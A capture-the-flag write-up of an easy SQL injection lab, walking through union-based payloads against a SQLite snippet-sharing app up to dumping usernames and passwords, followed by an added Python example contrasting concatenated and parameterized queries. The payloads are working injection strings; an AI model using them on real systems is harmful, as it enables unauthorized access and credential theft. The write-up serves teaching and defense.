# CopyPasta

Level: Easy\
Points: 10\
Type: Daily Challenge

Lab Interface

<figure><img src="https://559802299-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F8C3FiojCIEtxH7nox2Do%2Fuploads%2FUxPy3irXEpwX3czd9ALv%2Fimage.png?alt=media&#x26;token=c6821f02-184c-4f30-9bb1-5c8a84e29ed4" alt=""><figcaption></figcaption></figure>

After viewing any snippet, we have the option to share it, which gives us a link to the snippet.

<figure><img src="https://559802299-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F8C3FiojCIEtxH7nox2Do%2Fuploads%2Fl5eSIBt9cmujnNy7K65m%2Fimage.png?alt=media&#x26;token=e8e5020f-a725-4c9e-98c3-3c3f123f047b" alt=""><figcaption></figcaption></figure>

<figure><img src="https://559802299-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F8C3FiojCIEtxH7nox2Do%2Fuploads%2Fp6Yuo7HiXcPo9pSEjyR5%2Fimage.png?alt=media&#x26;token=dc0f37e9-e86e-45e8-ae71-c596c3a752ac" alt=""><figcaption></figcaption></figure>

Possible SQLi

Using the simple payload `' or 1=1-- -` proves that it is vulnerable to SQLi.

<figure><img src="https://559802299-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F8C3FiojCIEtxH7nox2Do%2Fuploads%2FIYHtw2pv2HAae4RCxTXw%2Fimage.png?alt=media&#x26;token=1e05994c-5e5a-4e3a-ad4e-100e9c19946e" alt=""><figcaption></figcaption></figure>

Finding the number of columns:

`' order by 7-- -` gives an error, hence the number of columns is 6.

<figure><img src="https://559802299-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F8C3FiojCIEtxH7nox2Do%2Fuploads%2FClRhYN8BF5MaXGVIYyd9%2Fimage.png?alt=media&#x26;token=c9cc6929-7ce4-46fd-b9e0-286bfb474460" alt=""><figcaption></figcaption></figure>

<figure><img src="https://559802299-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F8C3FiojCIEtxH7nox2Do%2Fuploads%2FBUt8wsPr5cEpcmEVHuLW%2Fimage.png?alt=media&#x26;token=206d79e1-7f72-49d6-87d6-e14f3b791a79" alt=""><figcaption></figcaption></figure>

Using `' union select 1,2,3,4,5,sqlite_version()-- -` confirms that the database is SQLite ([visit here for more info](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection#dbms-identification)).

<figure><img src="https://559802299-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F8C3FiojCIEtxH7nox2Do%2Fuploads%2F60uB6MQBvsGpxth0MQnA%2Fimage.png?alt=media&#x26;token=da031fd6-f164-4272-b146-706f3b88bf2d" alt=""><figcaption></figcaption></figure>

Dumping table names using:

```
' union select 1,2,3,4,5,group_concat(tbl_name) from sqlite_master where type='table'-- -
```

<figure><img src="https://559802299-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F8C3FiojCIEtxH7nox2Do%2Fuploads%2FJwuGd7PBYsGq45gcHYrO%2Fimage.png?alt=media&#x26;token=9adb5bc7-bf31-437e-b5d6-05fbaad1ee46" alt=""><figcaption></figcaption></figure>

`users` table looks interesting.

Next: dumping column names from table `users`

```
' union select 1,2,3,4,5,group_concat(name) from PRAGMA_TABLE_INFO('users')-- -
```

<figure><img src="https://559802299-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F8C3FiojCIEtxH7nox2Do%2Fuploads%2FfhBf9gHu8pAdRkwOOVjh%2Fimage.png?alt=media&#x26;token=0916d70a-c9c5-4552-8b84-94f142903a58" alt=""><figcaption></figcaption></figure>

Dumping the `username` and `password` columns from the `users` table:

```
' union select 1,2,3,4,username,password from users-- -
```

<figure><img src="https://559802299-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F8C3FiojCIEtxH7nox2Do%2Fuploads%2FyOjIYNLhHsH4nQOHPPSI%2Fimage.png?alt=media&#x26;token=a753c356-52ad-4f25-8f88-b8ca3759d7cf" alt=""><figcaption></figcaption></figure>
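
The root cause and its fix, as an added example that is not part of the original write-up or the lab's own code: the same payloads run against a string-concatenated lookup and against a parameterized one. The `snippets` table, its column names and the sample rows are constructed assumptions; only the `users` table with `username`/`password` and the payloads come from the write-up.

```python
import sqlite3

# Constructed stand-in for the lab's database: a six-column snippets table
# (column names are assumptions) and the users table seen in the write-up.
def build_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE snippets (id INTEGER, share_id TEXT, title TEXT,
                               lang TEXT, author TEXT, body TEXT);
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO snippets VALUES (1, 'abc123', 'hello', 'py', 'alice', 'print(1)');
        INSERT INTO users VALUES ('admin', 'constructed-secret');
    """)
    return db

def lookup_vulnerable(db, share_id):
    # Input is pasted into the SQL text, so a quote in share_id ends the
    # string literal and the rest is parsed as SQL.
    sql = "SELECT * FROM snippets WHERE share_id = '" + share_id + "'"
    return db.execute(sql).fetchall()

def lookup_safe(db, share_id):
    # Bound parameter: the driver passes share_id as a value, never as SQL.
    return db.execute(
        "SELECT * FROM snippets WHERE share_id = ?", (share_id,)
    ).fetchall()

# Payloads taken verbatim from the write-up.
PAYLOADS = [
    "' or 1=1-- -",
    "' union select 1,2,3,4,5,sqlite_version()-- -",
    "' union select 1,2,3,4,username,password from users-- -",
]

def compare(db):
    # For each payload, record how many rows each lookup returns.
    return [(len(lookup_vulnerable(db, p)), len(lookup_safe(db, p)))
            for p in PAYLOADS]

if __name__ == "__main__":
    db = build_db()
    for payload, (vuln, safe) in zip(PAYLOADS, compare(db)):
        print(f"{payload!r}: vulnerable={vuln} rows, parameterized={safe} rows")
```

With the bound parameter every payload is compared as a literal share ID and matches nothing, while a legitimate ID still returns its snippet.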
